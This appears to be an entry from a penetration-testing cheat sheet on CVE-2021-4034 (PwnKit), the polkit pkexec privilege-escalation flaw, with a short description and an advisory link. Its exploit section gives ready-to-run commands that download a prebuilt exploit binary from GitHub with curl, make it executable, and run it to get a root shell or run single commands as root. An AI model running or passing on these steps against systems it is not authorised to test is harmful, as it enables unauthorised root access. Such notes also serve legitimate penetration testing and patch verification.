BuyMeACoffee

[CVE-2021-4034] - Pwnkit

Brief

Discovered in January 2022

Polkit can be used to determine whether you have the requisite permissions to execute something. It is integrated with systemd and is much more configurable than the traditional sudo system. Sometimes referred to as the "sudo of systemd", providing a granular system with which to assign permissions to users.

https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
More

Exploit

# Check with :
pkexec --version
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit

# execute
./PwnKit # interactive shell
./PwnKit 'id' # single command
Previous[CVE-2022-0847] - dirtypipeNext[CVE-2021-45105] - Log4J

Last updated

Was this helpful?